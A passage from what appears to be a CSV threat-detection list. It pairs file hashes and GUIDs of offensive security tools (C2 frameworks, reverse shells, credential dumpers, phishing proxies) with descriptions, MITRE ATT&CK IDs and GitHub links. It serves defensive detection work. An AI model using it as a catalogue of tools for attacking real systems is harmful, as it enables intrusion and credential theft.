framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*52136cb222124a4b78b9cef3b9bd9e1a18a6687043597cb95138aa60bd26c76a*",".{0,1000}52136cb222124a4b78b9cef3b9bd9e1a18a6687043597cb95138aa60bd26c76a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*52652b9d89a6fd0617b8f0f60b0abef4a972fc0b7f1f861e5be029f7b2eb4dce*",".{0,1000}52652b9d89a6fd0617b8f0f60b0abef4a972fc0b7f1f861e5be029f7b2eb4dce.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*",".{0,1000}526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*528de69797c36423a1e6b64fa8b1825f354e6707f2ca3760d81a9f58d69d58bb*",".{0,1000}528de69797c36423a1e6b64fa8b1825f354e6707f2ca3760d81a9f58d69d58bb.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*52907aebc7d2c6534099d149e61bf294b0ddf7d4e814a72b3621e3a829f83c97*",".{0,1000}52907aebc7d2c6534099d149e61bf294b0ddf7d4e814a72b3621e3a829f83c97.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*529feaedec43ba6c1c4b0c31ab57575e6751fa894c90364ba81732de04bb3b44*",".{0,1000}529feaedec43ba6c1c4b0c31ab57575e6751fa894c90364ba81732de04bb3b44.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*52b07bced660711b3aa82b4cbf40156689045bcd695df40b1376c76e172beb8d*",".{0,1000}52b07bced660711b3aa82b4cbf40156689045bcd695df40b1376c76e172beb8d.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*52B0FF57-7E0A-4CA9-84D4-58DFA2456BA5*",".{0,1000}52B0FF57\-7E0A\-4CA9\-84D4\-58DFA2456BA5.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*52b1b3fa12706c1cc7ca2da321e23b151f812a5f7660f0114cc8470de3a3065d*",".{0,1000}52b1b3fa12706c1cc7ca2da321e23b151f812a5f7660f0114cc8470de3a3065d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*52c1a841d7d5551195a1ed8766dd7fcae0e5ad10efe5bd854f541e2879996f1e*",".{0,1000}52c1a841d7d5551195a1ed8766dd7fcae0e5ad10efe5bd854f541e2879996f1e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5312f40c37c8be83b7131d03100ca39c7e9862465dd40e62d13f153e4ddf1905*",".{0,1000}5312f40c37c8be83b7131d03100ca39c7e9862465dd40e62d13f153e4ddf1905.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*53153e63147a9924b06f0291a080ae86c692565a305e84f442b6b0a83f6a74c9*",".{0,1000}53153e63147a9924b06f0291a080ae86c692565a305e84f442b6b0a83f6a74c9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*53395d8379dfd716e8708b21490fdec662537be8c56d0df185df59d0ed68eb04*",".{0,1000}53395d8379dfd716e8708b21490fdec662537be8c56d0df185df59d0ed68eb04.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*533c13619981d1cc6c9780668aec4a86fc179a7a6ddf01b6b5d3ae7edd993572*",".{0,1000}533c13619981d1cc6c9780668aec4a86fc179a7a6ddf01b6b5d3ae7edd993572.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*534cd20e815e2f733e1d381d60b80cbdffa476ca72d16769ad4e080e7f26a803*",".{0,1000}534cd20e815e2f733e1d381d60b80cbdffa476ca72d16769ad4e080e7f26a803.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*534D9A24-3138-4209-A4C6-6B9C1EF0B579*",".{0,1000}534D9A24\-3138\-4209\-A4C6\-6B9C1EF0B579.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*535656aca26402527106fc7630aa58d64544975120b7ad1e21b91797b38db760*",".{0,1000}535656aca26402527106fc7630aa58d64544975120b7ad1e21b91797b38db760.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*537a987d9bfe60b24a9bef0a9214f64202e91ea5fe14b1c3063317387f595bf7*",".{0,1000}537a987d9bfe60b24a9bef0a9214f64202e91ea5fe14b1c3063317387f595bf7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 
- TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5400dd85170bb1f4597ffb2d761aab44e311f00b286c423bcf82a2c765bb8bd2*",".{0,1000}5400dd85170bb1f4597ffb2d761aab44e311f00b286c423bcf82a2c765bb8bd2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*542bee76ffdd8095a8d134b6eea2fa001c4af43c1e6cd4e296c2b8d52571c16c*",".{0,1000}542bee76ffdd8095a8d134b6eea2fa001c4af43c1e6cd4e296c2b8d52571c16c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*543111f63af0bba0de982e608dde5289571d227b941c74131a8b9df9a8dc2609*",".{0,1000}543111f63af0bba0de982e608dde5289571d227b941c74131a8b9df9a8dc2609.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*5439CECD-3BB3-4807-B33F-E4C299B71CA2*",".{0,1000}5439CECD\-3BB3\-4807\-B33F\-E4C299B71CA2.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - 
T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*543d7ad609377d2797ceba313047cdf1bd601553c3d49e34f58e1ec0ac438ab8*",".{0,1000}543d7ad609377d2797ceba313047cdf1bd601553c3d49e34f58e1ec0ac438ab8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*545769561413f19fbcf5a5593b70deb40d9b56c0acef1adb4854c98572867773*",".{0,1000}545769561413f19fbcf5a5593b70deb40d9b56c0acef1adb4854c98572867773.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5461cba9d022a943c36a95b7e1017274ae210aeb8b204c9d3a9ab5dcb40c90f8*",".{0,1000}5461cba9d022a943c36a95b7e1017274ae210aeb8b204c9d3a9ab5dcb40c90f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*54680b2daca9c4051463a646c0ea849190b741081670d933e00ed182b2efcc56*",".{0,1000}54680b2daca9c4051463a646c0ea849190b741081670d933e00ed182b2efcc56.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5477fc3d91c7db260acb251e6841c513b42cc0ebc9e0b794e819acbc65fa01b7*",".{0,1000}5477fc3d91c7db260acb251e6841c513b42cc0ebc9e0b794e819acbc65fa01b7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*549f93a48257b5d2003ff8faa655e0f8509f53d052eac0d952b06508caa05ef9*",".{0,1000}549f93a48257b5d2003ff8faa655e0f8509f53d052eac0d952b06508caa05ef9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*54b2757e66ac5e8173d2af618fed10afc4c3b28d02c6324847c24d8bb17c8a45*",".{0,1000}54b2757e66ac5e8173d2af618fed10afc4c3b28d02c6324847c24d8bb17c8a45.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a 
honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*54db0c7311eba1f9c32da2b1d0b9401117493a9b8bd58814e1cdb62239151204*",".{0,1000}54db0c7311eba1f9c32da2b1d0b9401117493a9b8bd58814e1cdb62239151204.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*550168d7c4f722b95288f8402f9ac3422dbbae250a3f36e3a10a985ac7f1c84a*",".{0,1000}550168d7c4f722b95288f8402f9ac3422dbbae250a3f36e3a10a985ac7f1c84a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*55049f7690abbbb5c8dc844e54b63269d111c0cd21e98854c666a27788dc5de6*",".{0,1000}55049f7690abbbb5c8dc844e54b63269d111c0cd21e98854c666a27788dc5de6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*55096accdcb71eb43edd3001d4f6ec9c40ea88d448ba9d845782ff8e70df2fb3*",".{0,1000}55096accdcb71eb43edd3001d4f6ec9c40ea88d448ba9d845782ff8e70df2fb3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*55199d5089be9072f5e556c5bb2fc11a3644fec2e652883e2b4da20e851552df*",".{0,1000}55199d5089be9072f5e556c5bb2fc11a3644fec2e652883e2b4da20e851552df.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5529ff4b4c60d1cfefb02f145e149ffb166229e03aff4d8917340190753cde9e*",".{0,1000}5529ff4b4c60d1cfefb02f145e149ffb166229e03aff4d8917340190753cde9e.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5*",".{0,1000}555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" 
"*555AD0AC-1FDB-4016-8257-170A74CB2F55*",".{0,1000}555AD0AC\-1FDB\-4016\-8257\-170A74CB2F55.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*555AD0AC-1FDB-4016-8257-170A74CB2F55*",".{0,1000}555AD0AC\-1FDB\-4016\-8257\-170A74CB2F55.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*55652291077fbb6c957ea42379d965892e29695a85ce00844c7b1c83971ac1e6*",".{0,1000}55652291077fbb6c957ea42379d965892e29695a85ce00844c7b1c83971ac1e6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*5571bc0232f7f7911042503b2a2224ad420788d999eb819257a00943928a56bb*",".{0,1000}5571bc0232f7f7911042503b2a2224ad420788d999eb819257a00943928a56bb.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*558a73bf1f4a3ecc59133a10d1a7892712f2bd30326f86a12d5c7060274d734d*",".{0,1000}558a73bf1f4a3ecc59133a10d1a7892712f2bd30326f86a12d5c7060274d734d.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*558df705dd4b6213c11e858b7c32960eaec39360*",".{0,1000}558df705dd4b6213c11e858b7c32960eaec39360.{0,1000}","offensive_tool_keyword","godoh","godoh is 
a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*559917334e8dd6e6828011019d20c15f23ab49a9747a08aaca275c6d44a5d811*",".{0,1000}559917334e8dd6e6828011019d20c15f23ab49a9747a08aaca275c6d44a5d811.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*559e5ff2b8afb25bbc62275355ba2ceb668e8707de6b221315afb6c2390ba68e*",".{0,1000}559e5ff2b8afb25bbc62275355ba2ceb668e8707de6b221315afb6c2390ba68e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*55a3bbb8a62578b455e478cb197aadd389f2e65418595e5df4636972be878710*",".{0,1000}55a3bbb8a62578b455e478cb197aadd389f2e65418595e5df4636972be878710.{0,1000}","offensive_tool_keyword","evilginx2","Standalone 
man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*55A48A19-1A5C-4E0D-A46A-5DB04C1D8B03*",".{0,1000}55A48A19\-1A5C\-4E0D\-A46A\-5DB04C1D8B03.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" 